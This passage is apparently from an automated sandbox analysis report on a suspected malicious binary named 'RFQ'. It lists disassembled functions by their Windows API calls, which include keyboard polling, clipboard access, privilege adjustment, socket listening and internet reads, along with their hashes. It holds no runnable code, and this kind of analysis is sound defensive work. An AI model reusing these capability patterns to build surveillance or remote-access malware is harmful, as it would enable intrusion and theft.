                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                    • String ID: \*.*
                                                                                                                                                    • API String ID: 2643075503-1173974218
                                                                                                                                                    • Opcode ID: 854ab6d6014c7be84c67841a389d76ac1fcdb2c15a0dca6bab504b4bc43cae78
                                                                                                                                                    • Instruction ID: 4af476337466d53098a2005eaf570db9c9bc0fdc0e831cbef6228a7a4d883954
                                                                                                                                                    • Opcode Fuzzy Hash: 854ab6d6014c7be84c67841a389d76ac1fcdb2c15a0dca6bab504b4bc43cae78
                                                                                                                                                    • Instruction Fuzzy Hash: CD3188B24083889EC721DBA48889EDB77DC6F56350F44492AF9D8C3141FA39D54D87A7
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079328E
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0079332D
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007933C5
                                                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00793604
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00793611
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1240663315-0
                                                                                                                                                    • Opcode ID: 5c076a09b89e099c9d304f6e520cddb739042f8a5a23822050b661932d89869b
                                                                                                                                                    • Instruction ID: dc1912c0cd036597ee2ec87ec5552d0412b9848a34dcd96ed2d2fc9b75b0e981
                                                                                                                                                    • Opcode Fuzzy Hash: 5c076a09b89e099c9d304f6e520cddb739042f8a5a23822050b661932d89869b
                                                                                                                                                    • Instruction Fuzzy Hash: 3FE14B71604200EFCB15DF28D995E2ABBE8EF88710F04856DF44ADB262DB38ED05CB52
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00772B5F
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00772BE0
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00772BFB
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00772C15
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00772C2A
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00772C42
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00772C54
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00772C6C
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00772C7E
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00772C96
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00772CA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: 480c85fe72c579543b3ded876fc601854cc3b08e2c84d82074802503bceaa35e
                                                                                                                                                    • Instruction ID: 50ce50187954259f46e883cf2eeb1c62603369614da3b03cb021bb4c9137f61d
                                                                                                                                                    • Opcode Fuzzy Hash: 480c85fe72c579543b3ded876fc601854cc3b08e2c84d82074802503bceaa35e
                                                                                                                                                    • Instruction Fuzzy Hash: 0741F6705047C96DFF369B6488047B9BEA0AF22384F04C059D5EA562C3EB9C9DC5C7B6
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                    • Opcode ID: a1a06dbfa4557d89d4d114676526609efc92a2b7719909c6802b56341f8ba001
                                                                                                                                                    • Instruction ID: 07eaf522273b9709dd683927efed60bb7e027603df274d21c03fdcc42c090b00
                                                                                                                                                    • Opcode Fuzzy Hash: a1a06dbfa4557d89d4d114676526609efc92a2b7719909c6802b56341f8ba001
                                                                                                                                                    • Instruction Fuzzy Hash: A2217A36300210AFDB21AF64DC49F6D77A8EF04751F04C019F90A9B2A1EB78ED018BA9
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00769ABF: CLSIDFromProgID.OLE32 ref: 00769ADC
                                                                                                                                                      • Part of subcall function 00769ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00769AF7
                                                                                                                                                      • Part of subcall function 00769ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00769B05
                                                                                                                                                      • Part of subcall function 00769ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00769B15
                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0078C235
                                                                                                                                                    • _memset.LIBCMT ref: 0078C242
                                                                                                                                                    • _memset.LIBCMT ref: 0078C360
                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0078C38C
                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0078C397
                                                                                                                                                    Strings
                                                                                                                                                    • NULL Pointer assignment, xrefs: 0078C3E5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                                                    • Opcode ID: 05c28cef8a6f8d356d79d47f55ed5e442c1be6acc9afbebad2c282eaf6e9b2b0
                                                                                                                                                    • Instruction ID: 299bb9dd10bcc500eebe7a92952ef27f6bfe3f73eaeca69db2ddf72a02c04ee0
                                                                                                                                                    • Opcode Fuzzy Hash: 05c28cef8a6f8d356d79d47f55ed5e442c1be6acc9afbebad2c282eaf6e9b2b0
                                                                                                                                                    • Instruction Fuzzy Hash: 71913C71D40218EBDB11EF94DC95EEEBBB8EF08710F10815AF919A7281EB745A45CFA0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076B180
                                                                                                                                                      • Part of subcall function 0076B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076B1AD
                                                                                                                                                      • Part of subcall function 0076B134: GetLastError.KERNEL32 ref: 0076B1BA
                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00777A0F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                                                                                    • API String ID: 2234035333-194228
                                                                                                                                                    • Opcode ID: c14b9b104ec9218cd8653d55516af585ee227687dfd7cedba44418ccf522ae48
                                                                                                                                                    • Instruction ID: 367aae089661b00140149f594afb90930b8f710b893014d36e3f0fe16a84868e
                                                                                                                                                    • Opcode Fuzzy Hash: c14b9b104ec9218cd8653d55516af585ee227687dfd7cedba44418ccf522ae48
                                                                                                                                                    • Instruction Fuzzy Hash: 17018471659212AAFF2C666CDC5FFBE72589B007C0F16C924BD4BA20D2E9AD5E00C1A4
                                                                                                                                                    APIs
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00788CA8
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788CB7
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00788CD3
                                                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00788CE2
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788CFC
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00788D10
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279440585-0
                                                                                                                                                    • Opcode ID: 40bcb01f2d85ddb7876eaec253c09421e944ea24f9c93a1e8977f03922d06c57
                                                                                                                                                    • Instruction ID: e6060ddd0cf95369dceaec31dd4fea838ae3b4c3a4819393202d3d36918df3db
                                                                                                                                                    • Opcode Fuzzy Hash: 40bcb01f2d85ddb7876eaec253c09421e944ea24f9c93a1e8977f03922d06c57
                                                                                                                                                    • Instruction Fuzzy Hash: 4721B171600201DFDB20FF68D989F6EB7A9EF48320F108158F916A72D2DB78AD418B61
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00776554
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00776564
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00776583
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 007765A7
                                                                                                                                                    • _wcscat.LIBCMT ref: 007765BA
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007765F9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1605983538-0
                                                                                                                                                    • Opcode ID: 04a04d14c5e9036ca9bfdbe14b21e9e784e11341cd1fdb58c251b7eb8564a6fe
                                                                                                                                                    • Instruction ID: 1a6cf9ac413aeb9c8a5463b7be57c05d8ec109030c4c39a641add60a85e253c5
                                                                                                                                                    • Opcode Fuzzy Hash: 04a04d14c5e9036ca9bfdbe14b21e9e784e11341cd1fdb58c251b7eb8564a6fe
                                                                                                                                                    • Instruction Fuzzy Hash: 1B21957190021CEBDF20ABA4CC88FDDB7BCAB08340F5044A5E509E7145EB799F95DB60
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU$}
• API String ID: 0-2976310808
• Opcode ID: 2f26e945d99406104b9f9d341ede8b3460a4fc148200911987ca695fb74d0135
• Instruction ID: 83beae5d92a0f35aaa1d48cc63afedae50075d2dc001f9898013654e5e092c75
• Opcode Fuzzy Hash: 2f26e945d99406104b9f9d341ede8b3460a4fc148200911987ca695fb74d0135
• Instruction Fuzzy Hash: B5929171E0021ACBEF24CF58C8417FDB7B1BB54314F14819AE956AB282E7B99D81CF91
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 007713DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: lstrlen
• String ID: ($,2~$<2~$|
• API String ID: 1659193697-1525565811
• Opcode ID: a0bc18055a4148fa50808dac3274c6edf05446502371a6d4271ba1794eea4fb1
• Instruction ID: f5cb408764145e48a2e88f778a723e168d636f5b4d863b63b057509d775ed066
• Opcode Fuzzy Hash: a0bc18055a4148fa50808dac3274c6edf05446502371a6d4271ba1794eea4fb1
• Instruction Fuzzy Hash: 24321375A00605DFCB28CF69C480A6AB7F0FF48360B51C56EE59ADB3A2E774E941CB44
APIs
  • Part of subcall function 0078A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0078A84E
• socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00789296
• WSAGetLastError.WSOCK32(00000000,00000000), ref: 007892B9
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: 10f6f4179b4d489f3aed58d6fe8af5cbdfd8eb471c63d75f5f311bd420001fe8
• Instruction ID: 4edc0877ce2208c5c43bffe8121fae9dd5b60e8a6d689eb6dc500b067330de56
• Opcode Fuzzy Hash: 10f6f4179b4d489f3aed58d6fe8af5cbdfd8eb471c63d75f5f311bd420001fe8
• Instruction Fuzzy Hash: 4441B570600504EFDB10BF64CC85E7E77EDEF44724F148548F9569B292DB789D018BA1
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0077EB8A
• _wcscmp.LIBCMT ref: 0077EBBA
• _wcscmp.LIBCMT ref: 0077EBCF
• FindNextFileW.KERNEL32(00000000,?), ref: 0077EBE0
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0077EC0E
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
• Opcode ID: 572e4b9d8dd87c910e3ded9b04f12239907a88efba67a427c6d23dc468d25e62
• Instruction ID: 3ba2e1783d56d1fed40919747016a5844e951ff22a202836dd4fa3c52ebb1e7a
• Opcode Fuzzy Hash: 572e4b9d8dd87c910e3ded9b04f12239907a88efba67a427c6d23dc468d25e62
• Instruction Fuzzy Hash: D741CF75600201DFCB18DF28C494E99B7E4FF49324F10859DFA5A8B3A1DB39A941CBA1
APIs
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 089a3da41d82f12e167d16911fc25ee94774b79d873089d99c20aea6959febe8
• Instruction ID: 597685d30661e7aa9f95505de64c8dfde63f27ca031de3d041bc4bffa8e50263
• Opcode Fuzzy Hash: 089a3da41d82f12e167d16911fc25ee94774b79d873089d99c20aea6959febe8
• Instruction Fuzzy Hash: 30119031740115ABEB212F26EC48F6EB799EF45760B04452DF849D7242DF7CAD0386A6
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0074E014,75920AE0,0074DEF1,007CDC38,?,?), ref: 0074E02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0074E03E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: d10598252c099e7e01b363dbada991027c8d92b7c332bc2595215e50a1052c9b
• Instruction ID: 092b0fae0f2badcde8f7d9fb2492e4d8fc7768a499f72f59accf9df897ed8b69
• Opcode Fuzzy Hash: d10598252c099e7e01b363dbada991027c8d92b7c332bc2595215e50a1052c9b
• Instruction Fuzzy Hash: 44D05E704407269EC7314B65EC0CB1276D9AF04310F298429E49192160EBBCC8818750
APIs
  • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
• DefDlgProcW.USER32(?,?,?,?,?), ref: 0074B22F
  • Part of subcall function 0074B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0074B5A5
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Proc$LongWindow
• String ID:
• API String ID: 2749884682-0
• Opcode ID: aafb51ac9809c6e71ede66ba48b9beda8543195a555fd3cb08afdb764eeb6e17
• Instruction ID: d34411016dd1c86b2f737dbbb7f09d4df76ec045063d80385848265fe908c64e
• Opcode Fuzzy Hash: aafb51ac9809c6e71ede66ba48b9beda8543195a555fd3cb08afdb764eeb6e17
• Instruction Fuzzy Hash: CEA12570114109FAEF28AF2A6C9DEBF296CFB87344F54421AF402D6191DB6DDC11D272
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007843BF,00000000), ref: 00784FA6
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00784FD2
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \Q~
• API String ID: 4104443479-2398764776
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0077E20D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0077E267
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0077E2B4
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 0074F4EA: std::exception::exception.LIBCMT ref: 0074F51E
  • Part of subcall function 0074F4EA: __CxxThrowException@8.LIBCMT ref: 0074F533
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076B180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076B1AD
• GetLastError.KERNEL32 ref: 0076B1BA
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00776623
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00776664
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0077666F
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00777223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0077723A
• FreeSid.ADVAPI32(?), ref: 0077724A
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0077F599
• FindClose.KERNEL32(00000000), ref: 0077F5C9
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0078BE6A,?,?,00000000,?), ref: 0077CEA7
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0078BE6A,?,?,00000000,?), ref: 0077CEB9
